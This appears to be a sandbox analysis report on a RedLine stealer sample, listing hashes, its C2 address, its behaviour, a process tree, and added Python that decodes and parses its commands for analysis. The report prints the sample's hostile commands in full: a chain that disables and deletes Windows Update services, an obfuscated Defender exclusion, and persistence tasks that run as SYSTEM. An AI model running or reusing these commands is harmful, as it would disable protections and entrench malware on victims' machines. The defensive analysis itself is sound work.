Analysis
max time kernel: 144s
max time network: 112s
platform: windows7_x64
resource: win7-20220812-en
resource tags: arch:x64 arch:x86 image:win7-20220812-en locale:en-us os:windows7-x64 system
submitted: 16-08-2022 16:08
Static task: static1
Behavioral task: behavioral1
Sample: C4Loader.exe
Resource: win7-20220812-en
General
Target: C4Loader.exe
Size: 5.4MB
MD5: 0b9e98abfc3cfa2a2c04902fad9d9016
SHA1: bcedd5e456e9a557223fca8448e3039a93fde13d
SHA256: 48d06d66376def1524df74eda17d52955a7240096f68b02012f8709dec02fa46
SHA512: 391f868b61868337ba1bbdd2743d5c399cfa509910bf5ce6d86bcb76d990895e31f8c79a40a97eccf0994ad74478024b47d07d6aa1b6a461b1ea7adb5afc2c2a
Malware Config
Extracted
Family: redline
C2: 107.182.129.73:21733
auth_value: bf3f0909cc45a7db3f5df6f0198db70c
Signatures

Modifies security service (2 TTPs, 2 IoCs)
  description   ioc                                                                   process
  Key deleted   \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Parameters  reg.exe
  Key deleted   \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Security    reg.exe

RedLine
  RedLine Stealer is a malware family written in C#, first appearing in early 2020.

RedLine payload (1 IoC)
  resource: behavioral1/memory/1088-143-0x0000000002970000-0x0000000002990000-memory.dmp
  yara_rule: family_redline

Blocklisted process makes network request (1 IoC)
  flow 5  PID 2044  powershell.exe

Downloads MZ/PE file

Drops file in Drivers directory (1 IoC)
  File opened for modification  C:\Windows\system32\drivers\etc\hosts  conhost.exe

Executes dropped EXE (5 IoCs)
  PID 1324  C4Loader.exe
  PID 1088  new1.exe
  PID 1448  SysApp.exe
  PID 1752  C4Update.exe
  PID 840   fodhelper.exe

Possible privilege escalation attempt (2 IoCs)
  PID 528   icacls.exe
  PID 1196  takeown.exe

Stops running service(s) (3 TTPs)

Loads dropped DLL (6 IoCs)
  PID 2044  powershell.exe  (6 loads)

Modifies file permissions (1 TTP, 2 IoCs)
  PID 528   icacls.exe
  PID 1196  takeown.exe

Reads user/profile data of web browsers (2 TTPs)
  Infostealers often target stored browser data, which can include saved credentials etc.

Accesses cryptocurrency files/wallets, possible credential harvesting (2 TTPs)

Checks installed software on the system (1 TTP)
  Looks up Uninstall key entries in the registry to enumerate software on the system.

Drops file in System32 directory (1 IoC)
  File opened for modification  C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk  powershell.exe

Suspicious use of SetThreadContext (1 IoC)
  PID 288 (C4Loader.exe) set thread context of PID 1452 (InstallUtil.exe)

Drops file in Program Files directory (2 IoCs)
  File created                  C:\Program Files\WindowsTas ks\Defender\DefenderUpdater.exe  conhost.exe
  File opened for modification  C:\Program Files\WindowsTasks\Defender\DefenderUpdater.exe  conhost.exe
Launches sc.exe (5 IoCs)
  sc.exe is the Windows utility for controlling services on the system.
  PID 1756  sc.exe
  PID 1076  sc.exe
  PID 1360  sc.exe
  PID 880   sc.exe
  PID 1328  sc.exe
Creates scheduled task(s) (1 TTP, 2 IoCs)
  Schtasks is often used by malware for persistence or to perform post-infection execution.
  PID 1208  schtasks.exe
  PID 1636  schtasks.exe

Modifies registry key (1 TTP, 9 IoCs)
  PID 1644  reg.exe
  PID 1904  reg.exe
  PID 616   reg.exe
  PID 1140  reg.exe
  PID 1636  reg.exe
  PID 1924  reg.exe
  PID 1956  reg.exe
  PID 1624  reg.exe
  PID 1788  reg.exe

Suspicious behavior: EnumeratesProcesses (34 IoCs, one per call; repeats shown as counts)
  PID 288   C4Loader.exe    x6
  PID 2044  powershell.exe  x9
  PID 1088  new1.exe        x6
  PID 1448  SysApp.exe      x5
  PID 1940  powershell.exe  x1
  PID 1964  conhost.exe     x1
  PID 1324  C4Loader.exe    x1
  PID 840   fodhelper.exe   x5

Suspicious use of AdjustPrivilegeToken (6 IoCs)
  Token: SeDebugPrivilege          PID 2044  powershell.exe
  Token: SeDebugPrivilege          PID 1940  powershell.exe
  Token: SeDebugPrivilege          PID 1964  conhost.exe
  Token: SeTakeOwnershipPrivilege  PID 1196  takeown.exe
  Token: SeDebugPrivilege          PID 1324  C4Loader.exe
  Token: SeDebugPrivilege          PID 1088  new1.exe

Suspicious use of WriteProcessMemory (64 IoCs, one per call; repeats shown as counts)
  PID 288   C4Loader.exe     wrote to memory of  PID 856   InstallUtil.exe  x7
  PID 288   C4Loader.exe     wrote to memory of  PID 1452  InstallUtil.exe  x9
  PID 1452  InstallUtil.exe  wrote to memory of  PID 2044  powershell.exe   x4
  PID 2044  powershell.exe   wrote to memory of  PID 1324  C4Loader.exe     x4
  PID 2044  powershell.exe   wrote to memory of  PID 1088  new1.exe         x4
  PID 2044  powershell.exe   wrote to memory of  PID 1448  SysApp.exe       x4
  PID 2044  powershell.exe   wrote to memory of  PID 1752  C4Update.exe     x4
  PID 1752  C4Update.exe     wrote to memory of  PID 1964  conhost.exe      x4
  PID 1964  conhost.exe      wrote to memory of  PID 1940  powershell.exe   x3
  PID 1964  conhost.exe      wrote to memory of  PID 1480  cmd.exe          x3
  PID 1480  cmd.exe          wrote to memory of  PID 1360  sc.exe           x3
  PID 1480  cmd.exe          wrote to memory of  PID 880   sc.exe           x3
  PID 1480  cmd.exe          wrote to memory of  PID 1076  sc.exe           x3
  PID 1480  cmd.exe          wrote to memory of  PID 1756  sc.exe           x3
  PID 1480  cmd.exe          wrote to memory of  PID 1328  sc.exe           x3
  PID 1480  cmd.exe          wrote to memory of  PID 1956  reg.exe          x3
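The rows above are one line per API call, which hides the shape of the chain. The following is an added example, not part of the report or of the sample: it parses the WriteProcessMemory and SetThreadContext rows (copied from the two signatures; the parser collapses the repeats), rebuilds parent/child lineage from them and reports the one pair that carries both signatures. Every parent/child edge in the process tree, down to cmd.exe launching sc.exe and reg.exe, appears as a WriteProcessMemory row, so that signature alone separates nothing here; the SetThreadContext row from C4Loader.exe (288) into InstallUtil.exe (1452) is what marks the .NET host as the hollowed target, and the process tree shows 1452 going on to spawn the powershell.exe stage. Lineage is keyed on PID because that is all the rows carry; the tree shows PIDs 288, 1452, 880, 1360, 1328, 840 and 1636 each reused by a later process, so a real pipeline keys on PID plus creation time.

```python
import re

# Rows copied from the report's "Suspicious use of WriteProcessMemory" and
# "Suspicious use of SetThreadContext" signatures. The report repeats each
# parent/child pair once per API call (64 rows in total); the duplicated
# first row below stands in for that and is collapsed by the parser.
WPM_ROWS = """
PID 288 wrote to memory of 856 288 C4Loader.exe InstallUtil.exe
PID 288 wrote to memory of 856 288 C4Loader.exe InstallUtil.exe
PID 288 wrote to memory of 1452 288 C4Loader.exe InstallUtil.exe
PID 1452 wrote to memory of 2044 1452 InstallUtil.exe powershell.exe
PID 2044 wrote to memory of 1324 2044 powershell.exe C4Loader.exe
PID 2044 wrote to memory of 1088 2044 powershell.exe new1.exe
PID 2044 wrote to memory of 1448 2044 powershell.exe SysApp.exe
PID 2044 wrote to memory of 1752 2044 powershell.exe C4Update.exe
PID 1752 wrote to memory of 1964 1752 C4Update.exe conhost.exe
PID 1964 wrote to memory of 1940 1964 conhost.exe powershell.exe
PID 1964 wrote to memory of 1480 1964 conhost.exe cmd.exe
PID 1480 wrote to memory of 1360 1480 cmd.exe sc.exe
PID 1480 wrote to memory of 1956 1480 cmd.exe reg.exe
"""
STC_ROWS = "PID 288 set thread context of 1452 288 C4Loader.exe InstallUtil.exe"

WPM_RE = re.compile(r"PID (\d+) wrote to memory of (\d+) \d+ (\S+) (\S+)")
STC_RE = re.compile(r"PID (\d+) set thread context of (\d+) \d+ (\S+) (\S+)")


def parse_rows(text, pattern):
    """{(src_pid, dst_pid): (src_image, dst_image)}; a dict collapses repeats."""
    return {(int(s), int(d)): (si, di) for s, d, si, di in pattern.findall(text)}


def image_names(edges):
    """pid -> image name, taken from whichever rows mention the pid."""
    names = {}
    for (s, d), (si, di) in edges.items():
        names[s], names[d] = si, di
    return names


def lineage(edges, pid):
    """Ancestor chain of pid as 'image(pid)' strings, root first. Keyed on PID
    only, which is all the report gives; the tree reuses several PIDs, so real
    telemetry should key on (pid, creation time) instead."""
    parent = {d: s for (s, d) in edges}
    names = image_names(edges)
    chain = [pid]
    while chain[-1] in parent:
        chain.append(parent[chain[-1]])
    return [f"{names[p]}({p})" for p in reversed(chain)]


def hollowing_candidates(wpm_edges, stc_edges):
    """Ordinary process creation also shows up here as the parent writing into
    the new child (every edge in the tree has WPM rows). A parent that also
    resets the child's thread context is the process-hollowing pattern, so
    only pairs present in both signatures are reported."""
    return {pair: wpm_edges[pair] for pair in wpm_edges if pair in stc_edges}


def children_of(edges, pid):
    """Direct children of pid, in row order."""
    return [d for (s, d) in edges if s == pid]


if __name__ == "__main__":
    wpm, stc = parse_rows(WPM_ROWS, WPM_RE), parse_rows(STC_ROWS, STC_RE)
    for (s, d), (si, di) in hollowing_candidates(wpm, stc).items():
        print(f"hollowing: {si}({s}) -> {di}({d})")
    print(" -> ".join(lineage(wpm, 1360)))
```

Run as a script it prints the single hollowing pair and the seven-process path from the original C4Loader.exe down to the sc.exe that stops UsoSvc.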
Processes (indentation shows parent/child nesting)

C:\Users\Admin\AppData\Local\Temp\C4Loader.exe  PID 288
  cmdline: "C:\Users\Admin\AppData\Local\Temp\C4Loader.exe"
  - Suspicious use of SetThreadContext
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of WriteProcessMemory
  C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe  PID 856
    cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
  C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe  PID 1452
    cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
    - Suspicious use of WriteProcessMemory
    C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  PID 2044
      cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "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"
      - Blocklisted process makes network request
      - Loads dropped DLL
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory
      C:\Users\Admin\AppData\Local\Temp\C4Loader.exe  PID 1324
        cmdline: "C:\Users\Admin\AppData\Local\Temp\C4Loader.exe"
        - Executes dropped EXE
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
      C:\Users\Admin\AppData\Local\Temp\new1.exe  PID 1088
        cmdline: "C:\Users\Admin\AppData\Local\Temp\new1.exe"
        - Executes dropped EXE
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
      C:\Users\Admin\AppData\Local\Temp\SysApp.exe  PID 1448
        cmdline: "C:\Users\Admin\AppData\Local\Temp\SysApp.exe"
        - Executes dropped EXE
        - Suspicious behavior: EnumeratesProcesses
        C:\Windows\SysWOW64\schtasks.exe  PID 1636
          cmdline: /C /create /F /sc minute /mo 1 /tn "Telemetry Logging" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exe"
          - Creates scheduled task(s)
      C:\Users\Admin\AppData\Local\Temp\C4Update.exe  PID 1752
        cmdline: "C:\Users\Admin\AppData\Local\Temp\C4Update.exe"
        - Executes dropped EXE
        - Suspicious use of WriteProcessMemory
        C:\Windows\System32\conhost.exe  PID 1964
          cmdline: "C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\C4Update.exe"
          - Drops file in Drivers directory
          - Drops file in Program Files directory
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of AdjustPrivilegeToken
          - Suspicious use of WriteProcessMemory
          C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  PID 1940
            cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHMAZAAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHkAbwB0AHYAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAZQB1ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHkAagBvAHUAIwA+AA=="
            - Drops file in System32 directory
            - Suspicious behavior: EnumeratesProcesses
            - Suspicious use of AdjustPrivilegeToken
          C:\Windows\System32\cmd.exe  PID 1480
            cmdline: "C:\Windows\System32\cmd.exe" /c
              sc stop UsoSvc
              & sc stop WaaSMedicSvc
              & sc stop wuauserv
              & sc stop bits
              & sc stop dosvc
              & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f
              & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f
              & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f
              & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f
              & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f
              & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll
              & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
              & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll
              & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f
              & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
              & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
              & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
              & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE
              & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE
              & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE
              & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE
              & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE
              & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE
              & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
            - Suspicious use of WriteProcessMemory
            C:\Windows\system32\reg.exe  PID 1644
              cmdline: reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f
              - Modifies registry key
            C:\Windows\system32\reg.exe  PID 1624
              cmdline: reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
              - Modifies registry key
            C:\Windows\system32\reg.exe  PID 1788
              cmdline: reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
              - Modifies registry key
            C:\Windows\system32\schtasks.exe  PID 1396
              cmdline: SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE
            C:\Windows\system32\reg.exe  PID 1904
              cmdline: reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
              - Modifies registry key
            C:\Windows\system32\schtasks.exe  PID 1292
              cmdline: SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE
            C:\Windows\system32\schtasks.exe  PID 1360
              cmdline: SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE
            C:\Windows\system32\schtasks.exe  PID 880
              cmdline: SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE
            C:\Windows\system32\schtasks.exe  PID 1452
              cmdline: SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE
            C:\Windows\system32\schtasks.exe  PID 1328
              cmdline: SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE
            C:\Windows\system32\schtasks.exe  PID 288
              cmdline: SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
          C:\Windows\System32\cmd.exe  PID 840
            cmdline: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdaterScanMachine" /tr "\"C:\Program Files\WindowsTasks\Defender\DefenderUpdater.exe\""
            C:\Windows\system32\schtasks.exe  PID 1208
              cmdline: schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdaterScanMachine" /tr "\"C:\Program Files\WindowsTasks\Defender\DefenderUpdater.exe\""
              - Creates scheduled task(s)
          C:\Windows\System32\cmd.exe  PID 872
            cmdline: "C:\Windows\System32\cmd.exe" /c schtasks /run /tn "GoogleUpdaterScanMachine"
            C:\Windows\system32\schtasks.exe  PID 876
              cmdline: schtasks /run /tn "GoogleUpdaterScanMachine"
C:\Windows\system32\sc.exe  PID 880
  cmdline: sc stop WaaSMedicSvc
  - Launches sc.exe
C:\Windows\system32\reg.exe  PID 616
  cmdline: reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f
  - Modifies registry key
C:\Windows\system32\reg.exe  PID 1140
  cmdline: reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f
  - Modifies security service
  - Modifies registry key
C:\Windows\system32\icacls.exe  PID 528
  cmdline: icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
  - Possible privilege escalation attempt
  - Modifies file permissions
C:\Windows\system32\takeown.exe  PID 1196
  cmdline: takeown /f C:\Windows\System32\WaaSMedicSvc.dll
  - Possible privilege escalation attempt
  - Modifies file permissions
  - Suspicious use of AdjustPrivilegeToken
C:\Windows\system32\reg.exe  PID 1636
  cmdline: reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f
  - Modifies registry key
C:\Windows\system32\reg.exe  PID 1924
  cmdline: reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f
  - Modifies registry key
C:\Windows\system32\reg.exe  PID 1956
  cmdline: reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f
  - Modifies registry key
C:\Windows\system32\sc.exe  PID 1328
  cmdline: sc stop dosvc
  - Launches sc.exe
C:\Windows\system32\sc.exe  PID 1756
  cmdline: sc stop bits
  - Launches sc.exe
C:\Windows\system32\sc.exe  PID 1076
  cmdline: sc stop wuauserv
  - Launches sc.exe
C:\Windows\system32\sc.exe  PID 1360
  cmdline: sc stop UsoSvc
  - Launches sc.exe
C:\Windows\system32\taskeng.exe  PID 936
  cmdline: taskeng.exe {346F0608-4D0F-4D0D-B1B3-B7142543406C} S-1-5-21-2292972927-2705560509-2768824231-1000:GRXNNIIE\Admin:Interactive:[1]
  C:\Users\Admin\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exe  PID 840
    cmdline: C:\Users\Admin\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exe
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
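Three things in this tree are worth pulling out mechanically rather than by eye: the -EncodedCommand handed to the second powershell.exe (PID 1940), the 24-command chain cmd.exe PID 1480 runs against Windows Update, and the two schtasks /create lines that keep fodhelper.exe (every minute) and DefenderUpdater.exe (at logon, as SYSTEM, highest run level) alive. The block below is an added example, not the sandbox's or the sample's code; the strings it parses are copied verbatim from the tree, and the bucket and field names are its own. Decoding the base64 as UTF-16LE yields `<#sd#> Add-MpPreference <#yotv#> -ExclusionPath @($env:UserProfile,$env:SystemDrive) <#eu#> -Force <#yjou#>`: a Defender exclusion covering the whole user profile and the system drive, padded with empty block comments so the cmdlet and its parameters never appear as one contiguous string. Two caveats when reading the chain: it targets Windows 10 components (UsoSvc, WaaSMedicSvc, dosvc and WaaSMedicSvc.dll do not exist on the Windows 7 image this run used, so those steps had nothing to act on and the wuauserv and bits steps, the AU policy values and whichever listed tasks exist are what actually changed), and cmd.exe's `&` runs every part regardless of whether the previous one failed, so nothing in it short-circuits.

```python
import base64
import re

# Verbatim from the process tree: the -EncodedCommand argument of powershell.exe PID 1940.
ENCODED = (
    "PAAjAHMAZAAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAA"
    "PAAjAHkAbwB0AHYAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAA"
    "QAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8"
    "ACMAZQB1ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHkAagBvAHUAIwA+AA=="
)

# Verbatim from the process tree: what cmd.exe PID 1480 was handed after /c.
CMD_CHAIN = (
    r"sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & "
    r"reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & "
    r"reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & "
    r"reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & "
    r"reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & "
    r"reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & "
    r"takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & "
    r"icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & "
    r"rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & "
    r"reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & "
    r"reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & "
    r"reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & "
    r"reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & "
    r'SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & '
    r'SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & '
    r'SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & '
    r'SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & '
    r'SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & '
    r'SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & '
    r'SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE'
)

# Verbatim from the process tree: the two schtasks /create lines (PIDs 1636 and 1208).
TASK_CREATES = [
    r'/C /create /F /sc minute /mo 1 /tn "Telemetry Logging" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exe"',
    r'schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdaterScanMachine" /tr "\"C:\Program Files\WindowsTasks\Defender\DefenderUpdater.exe\""',
]

TOKEN_RE = re.compile(r'"[^"]*"|\S+')  # quoted task names stay one token


def decode_encoded_command(b64):
    """-EncodedCommand is base64 over UTF-16LE. This sample pads the script
    with empty <# ... #> block comments to defeat naive substring matching;
    drop them and collapse whitespace to get the command PowerShell runs."""
    script = base64.b64decode(b64).decode("utf-16-le")
    return " ".join(re.sub(r"<#.*?#>", " ", script, flags=re.S).split())


def split_chain(cmdline):
    """cmd.exe runs 'a & b & c' left to right regardless of exit status, so
    every part is an independent action to record."""
    return [part.strip() for part in cmdline.split(" & ") if part.strip()]


def classify(commands):
    """Bucket each command by the Windows Update component it removes."""
    out = {"services_stopped": [], "service_keys_deleted": [], "tasks_disabled": [],
           "au_policy": {}, "files_touched": set(), "other": []}
    for cmd in commands:
        argv = [t.strip('"') for t in TOKEN_RE.findall(cmd)]
        low = [a.lower() for a in argv]
        if low[:2] == ["sc", "stop"]:
            out["services_stopped"].append(argv[2])
        elif low[:2] == ["reg", "delete"] and "\\services\\" in low[2]:
            out["service_keys_deleted"].append(argv[2].rsplit("\\", 1)[1])
        elif low[:2] == ["reg", "add"] and "/v" in low and "/d" in low:
            out["au_policy"][argv[low.index("/v") + 1]] = int(argv[low.index("/d") + 1])
        elif low[:2] == ["schtasks", "/change"] and "/disable" in low:
            out["tasks_disabled"].append(argv[low.index("/tn") + 1])
        elif low[0] in ("takeown", "icacls", "rename"):
            out["files_touched"].add(argv[2] if low[0] == "takeown" else argv[1])
        else:
            out["other"].append(cmd)
    return out


def parse_task_create(cmd):
    """Name, trigger, run-as and payload of a schtasks /create line."""
    def opt(flag):
        m = re.search(rf'/{flag}\s+(?:"([^"]*)"|(\S+))', cmd, re.I)
        return None if m is None else (m.group(2) if m.group(1) is None else m.group(1))
    # /tr may wrap an already-quoted path as \"...\"; take everything to the end.
    tr = re.search(r'/tr\s+"(.*)"\s*$', cmd, re.I)
    return {"name": opt("tn"), "schedule": opt("sc"), "modifier": opt("mo"),
            "run_as": opt("ru"), "level": opt("rl"),
            "command": tr.group(1).replace('\\"', '"').strip('"') if tr else None}


if __name__ == "__main__":
    print(decode_encoded_command(ENCODED))
    for bucket, items in classify(split_chain(CMD_CHAIN)).items():
        print(f"{bucket}: {items}")
    for line in TASK_CREATES:
        print(parse_task_create(line))
```

The same three functions apply to any report in this format: paste a tree's -EncodedCommand, cmd.exe /c argument or schtasks line into the constants and the output is the decoded script, the services/keys/tasks touched and the persistence entry's name, trigger, account and payload path.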
Network
MITRE ATT&CK Enterprise v6
Downloads (4 distinct files; the report lists them 15 times in total)

Filesize 2.7MB (listed 3 times)
  MD5     43a0526a928f9daca9c953221406af8e
  SHA1    34fdd0d94ecfe8c887ebb164068579013d2c611b
  SHA256  88e1fbd4e5494e3c2766300e8bab97edb08f3c7315c3d914b7d8b2dac25f8986
  SHA512  9632a96172d6db2d7b0e356a2bb661b397b3c8b380fbe151707322d204cee0ab82abbec4476ce6e43f5dfa67b9ae34d77909fbc966d431898b25dec9fbaea3fd

Filesize 7.4MB (listed 3 times)
  MD5     d5161722ad6b1c8e92214f444766cf36
  SHA1    3fb04eb73417c8f43e6f9870e4d3f7d4f5cd0178
  SHA256  58bfe2cebc786e38b71176fa64986cbae3080ce49f2e6d97f79233404c0f3028
  SHA512  1728b3525f2c1c6a99c1b0e83b3433acccec0322f29bf670bc0b3011f1c81c82e808a24fd1580a56a68155856dd30b453a119afe6a6eb8e38e5bc12198b11a4a

Filesize 1.5MB (listed 6 times)
  MD5     4d983d3bf57a1dd138034f68ae61c013
  SHA1    15c18965b9b20f940552776e2998ae969b6c0514
  SHA256  7a4fb7716f5226a48b13e1d66c4318dc76e2368e81fd359f1a9961486bebb58d
  SHA512  fe80805531c19d9726a9f7bb329bf20595e986dafe3bfd2ed0407e80bfa0526e2a7cb6908f64da53071d7b29f97d2567fe272b421afa57c859db9c752abc0b36

Filesize 1.4MB (listed 3 times)
  MD5     ecda9264fc1d959ffe35dc9accdd435a
  SHA1    72d7caf672d8b7ef901df21cee98b05a3290ac72
  SHA256  43590720dd2ae12f9fd462c5b4ef008a7e4795d12262e7d8f39006315c785321
  SHA512  4a6cb551db4d3f9f1ec334914d025f931a3b672e498bae72c18a7ed9aa83043e21bad7b0949f5fe8ad184b098be7fd5addcd5fb2fdbbfc535d5be2ac0164411e